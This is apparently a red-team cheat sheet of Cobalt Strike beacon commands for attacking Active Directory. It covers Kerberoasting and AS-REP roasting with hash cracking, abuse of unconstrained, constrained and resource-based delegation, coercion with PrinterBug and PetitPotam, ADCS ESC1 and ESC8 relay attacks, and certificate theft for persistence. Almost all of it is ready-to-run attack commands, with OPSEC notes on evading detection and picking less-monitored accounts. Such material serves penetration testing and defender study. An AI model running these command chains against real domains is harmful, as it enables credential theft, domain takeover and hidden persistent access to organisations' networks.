Kerberos Attacks & Domain Dominance#
Kerberos Attacks#
Kerberoasting#
Usage: Extract and crack service account passwords by requesting service tickets.
# ===== DISCOVERY PHASE =====
# Method 1: Enumerate Kerberoastable accounts with PowerView
beacon> powerpick Get-DomainUser -SPN | select samaccountname,serviceprincipalname | fl
# Method 2: ADSearch (faster, no PowerShell)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Method 3: LDAP query via PowerShell
beacon> powerpick Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName,samAccountName
# ===== EXPLOITATION PHASE =====
# Method 1: Rubeus Kerberoasting (recommended - most flexible)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /nowrap
# Kerberoast specific user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
# Kerberoast with RC4 encryption (easier to crack, but suspicious)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap /rc4
# Kerberoast with AES (default on modern Windows, harder to crack)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap /aes
# Kerberoast with output to file
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /outfile:C:\Temp\kerberoast_hashes.txt /nowrap
# Method 2: Invoke-Kerberoast (PowerView)
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
beacon> powerpick Invoke-Kerberoast -OutputFormat Hashcat | fl
# Method 3: Rubeus with delegation check (find high-value targets)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /stats
# Method 4: Targeted Kerberoasting (SPN filtering)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc* /nowrap
# ===== CRACKING PHASE =====
# Download hashes
beacon> download C:\Temp\kerberoast_hashes.txt
# Crack with hashcat (AES256 - $krb5tgs$18$)
$ hashcat -m 19700 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with hashcat (RC4 - $krb5tgs$23$)
$ hashcat -m 13100 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with John the Ripper
$ john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
# Advanced: Crack with rules
$ hashcat -m 13100 -a 0 kerberoast_hashes.txt wordlist.txt -r best64.rule --force
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Kerberoasting generates Event ID 4769 (TGS request)
# - RC4 (type 23) tickets are suspicious on modern networks (should be AES)
# - Multiple TGS requests from single account may trigger alerts
# - Service accounts often have strong passwords (25+ characters)
# - Target low-privileged service accounts first (less monitoring)
# - Avoid accounts with adminCount=1 (heavily monitored)
# Check for detections
beacon> powerpick Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} -MaxEvents 10 | select TimeCreated,Message
# OPSEC-friendly approach: Request only a few high-value SPNs
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:svc_sharepoint /nowrap
# Cleanup
beacon> shell del C:\Temp\kerberoast_hashes.txt
ASREPRoasting#
Usage: Attack user accounts with “Do not require Kerberos preauthentication” enabled.
# ===== DISCOVERY PHASE =====
# Method 1: Enumerate ASREPRoastable users with PowerView
beacon> powerpick Get-DomainUser -PreauthNotRequired | select samaccountname,distinguishedname | fl
# Method 2: ADSearch (faster)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# Method 3: LDAP filter via PowerShell
beacon> powerpick Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth,samAccountName
# ===== EXPLOITATION PHASE =====
# Method 1: Rubeus ASREPRoasting (recommended)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /nowrap
# ASREPRoast specific user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
# ASREPRoast with output to file
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /outfile:C:\Temp\asreproast_hashes.txt /nowrap
# ASREPRoast with domain specification
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /domain:corp.local /dc:dc01.corp.local /nowrap
# Method 2: ASREPRoast with username list (no domain access required)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:C:\Temp\users.txt /domain:corp.local /nowrap
# Method 3: PowerView ASREPRoasting
beacon> powerpick Get-DomainUser -PreauthNotRequired | Get-ASRepHash
# ===== CRACKING PHASE =====
# Download hashes
beacon> download C:\Temp\asreproast_hashes.txt
# Crack with hashcat (AS-REP - $krb5asrep$23$)
$ hashcat -m 18200 -a 0 asreproast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with John the Ripper
$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast_hashes.txt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ASREPRoasting generates Event ID 4768 (TGT request with no pre-auth)
# - Does NOT require valid domain credentials
# - Can be performed from unauthenticated context
# - Pre-auth disabled is rare in production (usually misconfig)
# - Less common than Kerberoasting (fewer targets)
# Advanced: Disable pre-auth on target account (requires permissions)
beacon> powerpick Set-DomainObject -Identity target_user -Set @{useraccountcontrol=4194304}
# Then ASREPRoast
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:target_user /nowrap
# Re-enable pre-auth (cleanup)
beacon> powerpick Set-DomainObject -Identity target_user -Clear useraccountcontrol
# Cleanup
beacon> shell del C:\Temp\asreproast_hashes.txt
Unconstrained Delegation Exploitation#
Usage: Exploit unconstrained delegation to capture TGT tickets from high-value targets.
# ===== DISCOVERY PHASE =====
# Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -Unconstrained | select dnshostname,samaccountname | ft -AutoSize
# Alternative: ADSearch
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# Find users with unconstrained delegation (rare, very dangerous)
beacon> powerpick Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname
# ===== PREREQUISITE: COMPROMISE UNCONSTRAINED DELEGATION HOST =====
# Assume we've compromised srv01.corp.local (has unconstrained delegation)
# Escalate to SYSTEM on the unconstrained delegation host
beacon> getuid
# ===== MONITORING PHASE =====
# Monitor for new TGT tickets (requires SYSTEM privileges)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap /filteruser:DC01$
# Alternative: Monitor without filtering
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrap
# List current cached tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# ===== COERCION PHASE =====
# Force target (DC or admin) to authenticate to our unconstrained delegation host
# Method 1: PrinterBug/SpoolSample (most reliable)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local srv01.corp.local
# Method 2: PetitPotam (if unpatched)
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password srv01.corp.local dc01.corp.local
# Method 3: Coercer (multiple protocols)
$ proxychains python3 Coercer.py -u jdoe -p password -d corp.local -l srv01.corp.local -t dc01.corp.local
# ===== TICKET EXTRACTION =====
# After coercion, DC$ TGT should be cached
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump the DC computer account TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x123456 /service:krbtgt /nowrap
# Alternative: Dump all tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /nowrap
# ===== EXPLOITATION WITH S4U =====
# Use captured DC TGT to perform S4U attack (impersonate any user to any service)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# Alternative: Impersonate domain admin
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:domain_admin /self /altservice:ldap/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# ===== TICKET INJECTION =====
# Create sacrificial logon session and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFyD[...]MuaW8=
# Steal token from sacrificial process
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# Cleanup
beacon> rev2self
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Unconstrained delegation is legacy (rare in modern environments)
# - Coercion attacks generate network traffic and authentication events
# - PrinterBug: Event ID 307 (print spooler)
# - PetitPotam: EFS RPC calls (if monitoring enabled)
# - TGT caching on delegation host is logged in Event ID 4624 (logon type 3)
# - Very powerful attack (DC compromise possible)
Constrained Delegation Exploitation#
Usage: Abuse constrained delegation to impersonate users to specific services.
# ===== DISCOVERY PHASE =====
# Find computers with constrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select dnshostname,samaccountname,msds-allowedtodelegateto | fl
# Alternative: ADSearch (returns JSON)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Find users with constrained delegation
beacon> powerpick Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | fl
# ===== PREREQUISITE: COMPROMISE CONSTRAINED DELEGATION ACCOUNT =====
# Assume we've compromised sql-2$ (computer account with constrained delegation)
# Escalate to SYSTEM or NT AUTHORITY\SYSTEM context
# ===== TGT EXTRACTION =====
# Check current privileges
beacon> getuid
# List cached tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump machine account TGT (LUID 0x3e4 = SYSTEM)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# Alternative: Request new TGT using machine account hash
beacon> mimikatz !sekurlsa::ekeys
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:sql-2$ /aes256:<aes256_key> /domain:corp.local /nowrap
# ===== S4U ATTACK (SERVICE FOR USER) =====
# Perform S4U2Self + S4U2Proxy to impersonate user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sql-2$ /ticket:doIFLD[...]MuSU8= /nowrap
# Explanation:
# S4U2Self: Obtain forwardable TGS for ourselves as "Administrator"
# S4U2Proxy: Use forwardable ticket to request TGS to cifs/dc01.corp.local
# ===== ALTERNATIVE SERVICE ABUSE =====
# If allowed SPN is limited, use /altservice to request different service
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
# Common service alternatives:
# cifs -> ldap (DCSync)
# http -> cifs (file access)
# host -> cifs (admin access)
# ===== TICKET INJECTION =====
# Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIGaD[...]ljLmlv
# Steal token
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
# DCSync if we used ldap service
beacon> dcsync corp.local CORP\krbtgt
# Cleanup
beacon> rev2self
# ===== PROTOCOL TRANSITION EXPLOITATION =====
# If account has TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag (T2A4D)
# Can use S4U2Self without requiring TGT
# Check for protocol transition
beacon> powerpick Get-DomainComputer -Identity sql-2 | select useraccountcontrol
# Exploit without TGT (using password or hash)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sql-2$ /rc4:<ntlm_hash> /nowrap
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Constrained delegation is legitimate feature (less suspicious)
# - S4U requests generate Event ID 4769 (TGS request)
# - S4U2Self: Ticket requests to ourselves
# - S4U2Proxy: Ticket requests to target service
# - Protocol transition is more common than traditional constrained delegation
# - Alternative service abuse may be logged if strict SPN validation enabled
Resource-Based Constrained Delegation (RBCD)#
Usage: Abuse writable msDS-AllowedToActOnBehalfOfOtherIdentity
attribute.
# ===== DISCOVERY PHASE =====
# Find computers with RBCD configured
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json
# Find computers where we have write access to msDS-AllowedToActOnBehalfOfOtherIdentity
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.ObjectAceType -eq "msDS-AllowedToActOnBehalfOfOtherIdentity" }
# Alternative: Find any writable properties on computer objects
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[\d]{4,10}" }
# Resolve SID to identify who has write access
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# ===== OPTION 1: USING COMPROMISED COMPUTER ACCOUNT =====
# Scenario: We control wkstn-2$ and have write access to dc-2$'s msDS-AllowedToActOnBehalfOfOtherIdentity
# Get SID of our controlled computer (wkstn-2$)
beacon> powerpick Get-DomainComputer -Identity wkstn-2 -Properties objectSid
# Configure RBCD to allow wkstn-2$ to impersonate to dc-2$
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity dc-2 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
# Verify configuration
beacon> powerpick Get-DomainComputer -Identity dc-2 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
# Alternative: Using StandIn
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer dc-2 --sid S-1-5-21-569305411-121244042-2357301523-1109
# Extract wkstn-2$ TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# Perform S4U attack
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:wkstn-2$ /impersonateuser:Administrator /msdsspn:cifs/dc-2.corp.local /ticket:doIFuD[...]5JTw== /nowrap
# Inject ticket and access
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIGcD[...]MuaW8=
beacon> steal_token <pid>
beacon> ls \\dc-2.corp.local\C$
# Cleanup: Remove RBCD configuration
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
# ===== OPTION 2: CREATING FAKE COMPUTER ACCOUNT =====
# Check machine account quota (default is 10)
beacon> powerpick Get-DomainObject -Identity "DC=corp,DC=local" -Properties ms-DS-MachineAccountQuota
# Create fake computer account
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
# Alternative: Using PowerMad
beacon> powershell-import C:\Tools\PowerMad\PowerMad.ps1
beacon> powerpick New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)
# Get SID of created computer
beacon> powerpick Get-DomainComputer -Identity EvilComputer -Properties objectSid
# Configure RBCD on target
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$(Get-DomainComputer -Identity EvilComputer -Properties objectSid | select -ExpandProperty objectSid))"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity dc-2 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
# Generate hash for fake computer account
PS> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:P@ssw0rd123! /user:EvilComputer$ /domain:corp.local
# Request TGT for fake computer
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:<aes256_hash> /domain:corp.local /nowrap
# Perform S4U attack (same as Option 1)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:EvilComputer$ /impersonateuser:Administrator /msdsspn:cifs/dc-2.corp.local /ticket:doIFuD[...]5JTw== /nowrap
# Cleanup: Remove fake computer and RBCD
beacon> powerpick Remove-DomainComputer -Identity EvilComputer
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - RBCD is self-delegation (target allows us to impersonate)
# - Requires write access to msDS-AllowedToActOnBehalfOfOtherIdentity
# - Machine account quota abuse may be monitored (Event ID 4741)
# - RBCD configuration changes are logged (Event ID 5136)
# - More flexible than constrained delegation (attacker-controlled)
# - Clean up RBCD configuration after exploitation
# - Consider using existing computer account instead of creating new one
Active Directory Certificate Services (ADCS) Attacks#
ADCS Enumeration#
Usage: Discover and analyze Certificate Authorities and vulnerable templates.
# ===== CA ENUMERATION =====
# Find Certificate Authorities
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas
# Get detailed CA information
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas /ca:corp-DC-CA
# Alternative: PowerShell enumeration
beacon> powerpick Get-ADObject -Filter * -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Properties *
# ===== TEMPLATE ENUMERATION =====
# Find all vulnerable certificate templates
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
# Find specific vulnerability classes
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable /currentuser
# Find templates allowing SAN (Subject Alternative Name)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /enrolleeSuppliesSubject
# Get detailed template information
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /showAllPermissions
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ADCS enumeration queries LDAP (Event ID 4662 on DCs)
# - Certificate requests are logged (Event ID 4886, 4887)
# - Web enrollment can be monitored via IIS logs
# - Certificate issuance generates Event ID 4888
ESC1: ENROLLEE_SUPPLIES_SUBJECT#
Usage: Abuse certificate templates allowing Subject Alternative Names to impersonate users.
# ===== PREREQUISITE: FIND VULNERABLE TEMPLATE =====
# Find templates with ENROLLEE_SUPPLIES_SUBJECT flag
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
# Example output:
# Template Name: VulnTemplate
# Enrollment Rights: CORP\Domain Users
# ENROLLEE_SUPPLIES_SUBJECT: True
# ===== EXPLOITATION PHASE =====
# Request certificate with alternative name (impersonate Administrator)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:VulnTemplate /altname:Administrator
# Output includes Base64-encoded certificate and private key
# ===== CERTIFICATE CONVERSION =====
# Copy certificate and private key to attack machine
# Save as cert.pem
# Convert to PFX format (requires OpenSSL)
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Enter password when prompted (e.g., "password123")
# ===== CERTIFICATE ENCODING =====
# Encode PFX for Rubeus
$ cat cert.pfx | base64 -w 0
# ===== AUTHENTICATION WITH CERTIFICATE =====
# Request TGT using certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /certificate:MIIM7w[...]ECAggA /password:password123 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
beacon> dcsync corp.local CORP\krbtgt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Certificate request generates Event ID 4886 (certificate requested)
# - Certificate issuance generates Event ID 4887 (certificate issued)
# - Unusual SAN values (admin accounts) may be monitored
# - Certificate authentication generates Event ID 4768 with certificate info
# - Consider requesting certificate for less-monitored accounts first
ESC8: NTLM Relay to ADCS HTTP Endpoints#
Usage: Relay NTLM authentication to ADCS web enrollment for certificate-based attacks.
# ===== PREREQUISITE: IDENTIFY WEB ENROLLMENT =====
# Check for ADCS Web Enrollment
beacon> powerpick Invoke-WebRequest -Uri "http://dc01.corp.local/certsrv" -UseDefaultCredentials
# Enumerate web enrollment endpoints
$ curl -k https://dc01.corp.local/certsrv/certfnsh.asp
# ===== SETUP SOCKS PROXY =====
# Start SOCKS proxy on beacon
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Configure proxychains
$ sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 1080 socks_user socks_password
# ===== SETUP NTLM RELAY =====
# Run ntlmrelayx targeting ADCS web enrollment
$ sudo proxychains ntlmrelayx.py -t https://dc01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --no-http-server --template DomainController
# Alternative: Target specific certificate template
$ sudo proxychains ntlmrelayx.py -t https://dc01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template Machine --no-http-server
# ===== SETUP PORT REDIRECTION =====
# Setup reverse port forward for SMB
beacon> rportfwd 8445 127.0.0.1 445
# Upload WinDivert driver for PortBender
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
# Start PortBender to redirect port 445 to 8445
beacon> PortBender redirect 445 8445
# ===== COERCION PHASE =====
# Method 1: PrinterBug (force DC to authenticate)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local <current_host_ip>
# Method 2: PetitPotam
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe <current_host_ip> dc01.corp.local
# Method 3: Coercer (multiple protocols)
$ proxychains python3 Coercer.py -u jdoe -p password -d corp.local -l <current_host_ip> -t dc01.corp.local --always-continue
# ===== CERTIFICATE RETRIEVAL =====
# ntlmrelayx will automatically request certificate
# Output: Base64-encoded certificate saved to disk
# Convert certificate to PFX (on attack machine)
$ cat dc01_cert.b64 | base64 -d > dc01_cert.pfx
# ===== AUTHENTICATION WITH CERTIFICATE =====
# Encode certificate for Rubeus
$ cat dc01_cert.pfx | base64 -w 0
# Request TGT using DC certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:dc01$ /certificate:MIIM7w[...]ECAggA /nowrap
# ===== S4U ATTACK WITH MACHINE CERTIFICATE =====
# Use DC$ ticket to perform S4U and impersonate domain admin
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# Inject ticket and access DC
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> steal_token <pid>
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# ===== CLEANUP =====
# Stop PortBender
beacon> jobs
beacon> jobkill <portbender_job_id>
# Remove WinDivert driver
beacon> shell del C:\Windows\system32\drivers\WinDivert64.sys
# Stop reverse port forward
beacon> rportfwd stop 8445
# Stop SOCKS proxy
beacon> socks stop
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ESC8 requires NTLM relay (SMB signing must be disabled or not enforced)
# - Certificate requests via web enrollment logged in IIS logs
# - Event ID 4886/4887 (certificate request/issuance)
# - Coercion attacks generate authentication events
# - PortBender requires driver loading (can trigger EDR)
# - Consider timing attacks during maintenance windows
ADCS Persistence#
Usage: Maintain persistent access using certificate-based authentication.
User Certificate Persistence#
# ===== ENUMERATE EXISTING CERTIFICATES =====
# Check for existing user certificates
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
# List user certificates with Mimikatz
beacon> mimikatz crypto::certificates /systemstore:CURRENT_USER
# ===== EXPORT USER CERTIFICATES =====
# Export all user certificates (including private keys)
beacon> mimikatz crypto::certificates /export
# Certificates saved to disk as .pfx files
# Download exported certificates
beacon> download "CURRENT_USER_My_0_Administrator.pfx"
# Alternative: Export specific certificate by thumbprint
beacon> powerpick $cert = Get-ChildItem -Path Cert:\CurrentUser\My\<thumbprint>; Export-PfxCertificate -Cert $cert -FilePath C:\Temp\user_cert.pfx -Password (ConvertTo-SecureString -String "password123" -Force -AsPlainText)
# ===== ENCODE CERTIFICATE FOR RUBEUS =====
# Encode PFX on Linux
$ cat "CURRENT_USER_My_0_Administrator.pfx" | base64 -w 0
# ===== AUTHENTICATE WITH STOLEN CERTIFICATE =====
# Request TGT using certificate (use "mimikatz" as password if exported by Mimikatz)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /certificate:MIINeg[...]IH0A== /password:mimikatz /enctype:aes256 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
# ===== REQUEST NEW USER CERTIFICATE (IF NONE EXISTS) =====
# Request certificate using User template
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:User
# Follow steps from ESC1 to convert and use certificate
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Certificate theft provides long-term access (typically 1 year validity)
# - Certificate authentication generates Event ID 4768 with cert info
# - Stolen certificates work even after password changes
# - Certificate revocation must be checked (CRL/OCSP)
# - Less suspicious than repeated password authentication
Computer Certificate Persistence#
# ===== EXPORT MACHINE CERTIFICATE (REQUIRES SYSTEM) =====
# Verify SYSTEM privileges
beacon> getuid
# Export machine certificates
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
# Download machine certificate
beacon> download "LOCAL_MACHINE_My_0_DC01.corp.local.pfx"
# ===== ENCODE CERTIFICATE =====
$ cat "LOCAL_MACHINE_My_0_DC01.corp.local.pfx" | base64 -w 0
# ===== AUTHENTICATE WITH MACHINE CERTIFICATE =====
# Request TGT for computer account
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:DC01$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
# Perform S4U to impersonate users
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:ldap/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# ===== REQUEST NEW MACHINE CERTIFICATE (IF NEEDED) =====
# Request machine certificate (requires SYSTEM and enrollment rights)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:Machine /machine
